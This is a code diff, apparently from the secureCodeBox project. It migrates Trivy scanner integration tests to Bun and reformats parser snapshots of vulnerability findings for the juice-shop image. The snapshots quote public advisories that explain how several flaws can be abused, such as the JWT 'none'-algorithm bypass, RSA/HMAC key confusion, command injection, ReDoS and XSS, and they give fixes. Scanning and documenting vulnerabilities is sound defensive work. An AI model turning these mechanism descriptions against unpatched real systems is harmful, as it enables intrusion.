90, ); expect(count).toBeGreaterThanOrEqual(40); @@ -23,10 +21,10 @@ test.concurrent( expect(severities["medium"]).toBeGreaterThanOrEqual(10); expect(severities["low"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "trivy filesystem scan with exiting files should not fail", async () => { const { categories, severities, count } = await scan( @@ -35,78 +33,96 @@ test.concurrent( ["/repo/"], 90, // volumes - [{ - "name": "test-dir", - "emptyDir": {} - }], + [ + { + name: "test-dir", + emptyDir: {}, + }, + ], // volumeMounts - [{ - "mountPath": "/repo/", - "name": "test-dir" - }], + [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], // initContainers - [{ - "name": "init-git", - "image": "bitnami/git", - "command": ["bash", - "-c", - // Bash script to create a git repo with a demo file - `cd /repo && \\ - git clone https://github.com/knqyf263/trivy-ci-test`], - "volumeMounts": [{ - "mountPath": "/repo/", - "name": "test-dir" - }] - }] + [ + { + name: "init-git", + image: "bitnami/git", + command: [ + "bash", + "-c", + // Bash script to create a git repo with a demo file + `cd /repo && \\ + git clone https://github.com/knqyf263/trivy-ci-test`, + ], + volumeMounts: [ + { + mountPath: "/repo/", + name: "test-dir", + }, + ], + }, + ], ); expect(count).toBeGreaterThanOrEqual(9); expect(severities["high"]).toBeGreaterThanOrEqual(2); expect(severities["medium"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "trivy repo scan with exiting repo should not fail", async () => { const { categories, severities, count } = await scan( "trivy-repo-test", "trivy-repo", ["https://github.com/knqyf263/trivy-ci-test"], - 90 + 90, ); expect(count).toBeGreaterThanOrEqual(9); expect(severities["high"]).toBeGreaterThanOrEqual(2); expect(severities["medium"]).toBeGreaterThanOrEqual(1); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "Invalid argument should be marked as errored", async () => { await expect( scan( - "trivy-invalidArg", - "trivy", + "trivy-invalid-arg", + "trivy-image", ["--invalidArg", "not/a-valid-image:v0.0.0"], - 90 - ) - ).rejects.toThrow("HTTP request failed"); + 90, + ), + ).rejects.toThrow( + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', + ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); -test.concurrent( +test( "trivy k8s scan should not fail", async () => { const { categories, severities, count } = await scan( "trivy-k8s-test", "trivy-k8s", // scanners is limited to config, and namespace to default to reduce the time of the test - ["--debug", "--scanners", "misconfig", "--include-namespaces", "securecodebox-system"], - 10 * 60 * 1000 + [ + "--debug", + "--scanners", + "misconfig", + "--include-namespaces", + "securecodebox-system", + ], + 10 * 60 * 1000, ); // since the state of the k8s cluster in the test environment cannot be predicted, only the structure of the result is assured here @@ -122,5 +138,5 @@ test.concurrent( expect(severityNames.includes("medium")).toBeTruthy(); expect(severityNames.includes("high")).toBeTruthy(); }, - 10 * 60 * 1000 + { timeout: 10 * 60 * 1000 }, ); diff --git a/scanners/trivy/parser/__snapshots__/parser.test.js.snap b/scanners/trivy/parser/__snapshots__/parser.test.js.snap index b7b5750a54..b9366b68f2 100644 --- a/scanners/trivy/parser/__snapshots__/parser.test.js.snap +++ b/scanners/trivy/parser/__snapshots__/parser.test.js.snap @@ -1,4 +1,4 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP +// Bun Snapshot v1, https://goo.gl/fbAQLP exports[`parses bkimminich/juice-shop:v10.2.0 result file into findings 1`] = ` [ @@ -7491,12 +7491,14 @@ exports[`parses bkimminich/juice-shop:v10.2.0 result file into findings 1`] = ` "vulnerabilityId": "GHSA-rvg8-pwq2-xj7q", }, "category": "NPM Package Vulnerability", - "description": "Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. + "description": +"Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. ## Recommendation -Update to version 3.0.0 or later.", +Update to version 3.0.0 or later." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package base64url to the fixed version: 3.0.0 or remove the package from the image.", "name": "Out-of-bounds Read in base64url", @@ -10706,9 +10708,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -10906,9 +10910,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -12015,8 +12021,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -12346,8 +12354,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -12487,11 +12497,13 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2016-1000223", }, "category": "NPM Package Vulnerability", - "description": "Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. + "description": +"Since "algorithm" isn't enforced in \`jws.verify()\`, a malicious user could choose what algorithm is sent to the server. If the server is expecting RSA but is sent HMAC-SHA with RSA's public key, the server will think the public key is actually an HMAC private key. This could be used to forge any data an attacker wants. In addition, there is the \`none\` algorithm to be concerned about. In versions prior to 3.0.0, verification of the token could be bypassed when the \`alg\` field is set to \`none\`. -*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*", +*Edit ( 7/29/16 ): A previous version of this advisory incorrectly stated that the vulnerability was patched in version 2.0.0 instead of 3.0.0. The advisory has been updated to reflect this new information. Thanks to Fabien Catteau for reporting the error.*" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package jws to the fixed version: >=3.0.0 or remove the package from the image.", "name": "Forgeable Public/Private Tokens", @@ -14285,12 +14297,14 @@ In addition, there is the \`none\` algorithm to be concerned about. In versions "vulnerabilityId": "GHSA-5mrr-rgp6-x4gr", }, "category": "NPM Package Vulnerability", - "description": "All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. + "description": +"All versions of \`marsdb\` are vulnerable to Command Injection. In the \`DocumentMatcher\` class, selectors on \`$where\` clauses are passed to a Function constructor unsanitized. This allows attackers to run arbitrary commands in the system when the function is executed. ## Recommendation -No fix is currently available. Consider using an alternative package until a fix is made available.", +No fix is currently available. Consider using an alternative package until a fix is made available." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package marsdb to the fixed version: undefined or remove the package from the image.", "name": "Command Injection in marsdb", @@ -17088,7 +17102,8 @@ No fix is currently available. Consider using an alternative package until a fix "vulnerabilityId": "GHSA-v78c-4p63-2j6c", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact * if Alice uses \`grunt data\` (or \`grunt release\`) to prepare a custom-build, moment-timezone with the latest tzdata from IANA's website * and Mallory intercepts the request to IANA's unencrypted ftp server, Mallory can serve data which might exploit further stages of the moment-timezone tzdata pipeline, or potentially produce a tainted version of moment-timezone (practicality of such attacks is not proved) @@ -17098,7 +17113,8 @@ Problem has been patched in version 0.5.35, patch should be applicable with mino ### Workarounds Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt data:2014d\`, then run the rest of the release tasks by hand), or just apply the patch before issuing the grunt command. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Cleartext Transmission of Sensitive Information in moment-timezone", @@ -17133,7 +17149,8 @@ Specify the exact version of tzdata (like \`2014d\`, full command being \`grunt "vulnerabilityId": "GHSA-56x4-j7p9-fcf9", }, "category": "NPM Package Vulnerability", - "description": "### Impact + "description": +"### Impact All versions of moment-timezone from 0.1.0 contain build tasks vulnerable to command injection. @@ -17232,7 +17249,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec ### References * https://knowledge-base.secureflag.com/vulnerabilities/code_injection/os_command_injection_nodejs.html -* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/", +* https://auth0.com/blog/preventing-command-injection-attacks-in-node-js-apps/" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package moment-timezone to the fixed version: 0.5.35 or remove the package from the image.", "name": "Command Injection in moment-timezone", @@ -17675,7 +17693,8 @@ The supplied patch on top of 0.5.34 is applicable with minor tweaks to all affec "vulnerabilityId": "GHSA-xgh6-85xh-479p", }, "category": "NPM Package Vulnerability", - "description": "\`npm-user-validate\` before version \`1.0.1\` is vulnerable to a Regular Expression Denial of Service (REDos). The regex that validates user emails took exponentially longer to process long input strings beginning with \`@\` characters. + "description": +"\`npm-user-validate\` before version \`1.0.1\` is vulnerable to a Regular Expression Denial of Service (REDos). The regex that validates user emails took exponentially longer to process long input strings beginning with \`@\` characters. ### Impact The issue affects the \`email\` function. If you use this function to process arbitrary user input with no character limit the application may be susceptible to Denial of Service. @@ -17684,7 +17703,8 @@ The issue affects the \`email\` function. If you use this function to process ar The issue is patched in version 1.0.1 by improving the regular expression used and also enforcing a 254 character limit. ### Workarounds -Restrict the character length to a reasonable degree before passing a value to \`.emal()\`; Also, consider doing a more rigorous sanitizing/validation beforehand.", +Restrict the character length to a reasonable degree before passing a value to \`.emal()\`; Also, consider doing a more rigorous sanitizing/validation beforehand." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package npm-user-validate to the fixed version: 1.0.1 or remove the package from the image.", "name": "Regular Expression Denial of Service in npm-user-validate", @@ -19574,7 +19594,8 @@ Restrict the character length to a reasonable degree before passing a value to \ "vulnerabilityId": "NSWG-ECO-154", }, "category": "NPM Package Vulnerability", - "description": "Sanitize-html is a library for scrubbing html input of malicious values. + "description": +"Sanitize-html is a library for scrubbing html input of malicious values. Versions 1.11.1 and below are vulnerable to cross site scripting (XSS) in certain scenarios: @@ -19592,7 +19613,8 @@ var clean = sanitizeHtml(dirty, { console.log(clean); // !! -\`\`\`", +\`\`\`" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package sanitize-html to the fixed version: >=1.11.4 or remove the package from the image.", "name": "Cross Site Scripting", @@ -19654,10 +19676,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -19815,10 +19839,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -19976,10 +20002,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20137,10 +20165,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20298,10 +20328,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20459,10 +20491,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20620,10 +20654,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20781,10 +20817,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -20942,10 +20980,12 @@ console.log(clean); "vulnerabilityId": "CVE-2022-25883", }, "category": "NPM Package Vulnerability", - "description": "Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. + "description": +"Versions of the package semver before 7.5.2 are vulnerable to Regular Expression Denial of Service (ReDoS) via the function new Range, when untrusted user data is provided as a range. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package semver to the fixed version: 7.5.2, 6.3.1, 5.7.2 or remove the package from the image.", "name": "nodejs-semver: Regular expression denial of service", @@ -21505,9 +21545,11 @@ console.log(clean); "vulnerabilityId": "CVE-2022-0355", }, "category": "NPM Package Vulnerability", - "description": "Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. + "description": +"Improper Removal of Sensitive Information Before Storage or Transfer in NPM simple-get prior to 4.0.1. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package simple-get to the fixed version: 4.0.1, 3.1.1, 2.8.2 or remove the package from the image.", "name": "simple-get: exposure of sensitive information to an unauthorized actor", @@ -21582,8 +21624,10 @@ console.log(clean); "vulnerabilityId": "CVE-2024-38355", }, "category": "NPM Package Vulnerability", - "description": "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. -", + "description": +"Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit \`15af22fc22\` which has been included in \`socket.io@4.6.2\` (released in May 2023). The fix was backported in the 2.x branch as well with commit \`d30630ba10\`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the "error" event to catch these errors. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package socket.io to the fixed version: 2.5.1, 4.6.2 or remove the package from the image.", "name": "socket.io: Unhandled 'error' event", @@ -21866,9 +21910,11 @@ console.log(clean); "vulnerabilityId": "CVE-2023-32695", }, "category": "NPM Package Vulnerability", - "description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. + "description": +"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package socket.io-parser to the fixed version: 4.2.3, 3.4.3, 3.3.4 or remove the package from the image.", "name": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", @@ -22097,9 +22143,11 @@ console.log(clean); "vulnerabilityId": "CVE-2023-32695", }, "category": "NPM Package Vulnerability", - "description": "socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. + "description": +"socket.io parser is a socket.io encoder and decoder written in JavaScript complying with version 5 of socket.io-protocol. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. A patch has been released in version 4.2.3. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package socket.io-parser to the fixed version: 4.2.3, 3.4.3, 3.3.4 or remove the package from the image.", "name": "socket.io parser is a socket.io encoder and decoder written in JavaScr ...", @@ -22335,7 +22383,8 @@ console.log(clean); "vulnerabilityId": "GHSA-qrmm-w75w-3wpx", }, "category": "NPM Package Vulnerability", - "description": "SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. + "description": +"SwaggerUI supports displaying remote OpenAPI definitions through the \`?url\` parameter. This enables robust demonstration capabilities on sites like \`petstore.swagger.io\`, \`editor.swagger.io\`, and similar sites, where users often want to see what their OpenAPI definitions would look like rendered. However, this functionality may pose a risk for users who host their own SwaggerUI instances. In particular, including remote OpenAPI definitions opens a vector for phishing attacks by abusing the trusted names/domains of self-hosted instances. @@ -22385,7 +22434,8 @@ Through the exploration of this issue, it became apparent that users may not be ## Reflected XSS attack **Warning** in versions < 3.38.0, it is possible to combine the URL options (as mentioned above) with a vulnerability in DOMPurify (https://www.cvedetails.com/cve/CVE-2020-26870/) to create a reflected XSS vector. If your version of Swagger UI is older than 3.38.0, we suggest you upgrade or implement the workaround as mentioned above. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package swagger-ui-dist to the fixed version: 4.1.3 or remove the package from the image.", "name": "Server side request forgery in SwaggerUI", @@ -24025,9 +24075,11 @@ Through the exploration of this issue, it became apparent that users may not be "vulnerabilityId": "CVE-2023-26115", }, "category": "NPM Package Vulnerability", - "description": "All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. + "description": +"All versions of the package word-wrap are vulnerable to Regular Expression Denial of Service (ReDoS) due to the usage of an insecure regular expression within the result variable. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v10.2.0", "mitigation": "Update the affected package word-wrap to the fixed version: 1.2.4 or remove the package from the image.", "name": "word-wrap: ReDoS", @@ -28509,12 +28561,14 @@ exports[`parses bkimminich/juice-shop:v12.10.2 result file into findings 1`] = ` "vulnerabilityId": "GHSA-rvg8-pwq2-xj7q", }, "category": "NPM Package Vulnerability", - "description": "Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. + "description": +"Versions of \`base64url\` before 3.0.0 are vulnerable to to out-of-bounds reads as it allocates uninitialized Buffers when number is passed in input on Node.js 4.x and below. ## Recommendation -Update to version 3.0.0 or later.", +Update to version 3.0.0 or later." +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package base64url to the fixed version: 3.0.0 or remove the package from the image.", "name": "Out-of-bounds Read in base64url", @@ -30616,9 +30670,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -30816,9 +30872,11 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-25881", }, "category": "NPM Package Vulnerability", - "description": "This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. + "description": +"This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. -", +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package http-cache-semantics to the fixed version: 4.1.1 or remove the package from the image.", "name": "http-cache-semantics: Regular Expression Denial of Service (ReDoS) vulnerability", @@ -31639,8 +31697,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. +" +, "location": "scb://trivy/?ArtifactName=bkimminich/juice-shop:v12.10.2", "mitigation": "Update the affected package jsonwebtoken to the fixed version: 9.0.0 or remove the package from the image.", "name": "jsonwebtoken: Insecure default algorithm in jwt.verify() could lead to signature validation bypass", @@ -31970,8 +32030,10 @@ Update to version 3.0.0 or later.", "vulnerabilityId": "CVE-2022-23540", }, "category": "NPM Package Vulnerability", - "description": "In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the \`jwt.verify()\` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the \`none\` algorithm. If you need 'none' algorithm, you have to explicitly specify that in \`jwt.verify()\` options. -", + "description": +"In versions \`<=8.5.1\` of \`jsonwebtoken\` library, lack of algorithm definition in the \`jwt.verify()\` function can lead to signature validation bypass due to defaulting to the \`none\` algorithm for signature verification. Users are affected if you do not specify algorithms in the \`jwt.verify()\` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in 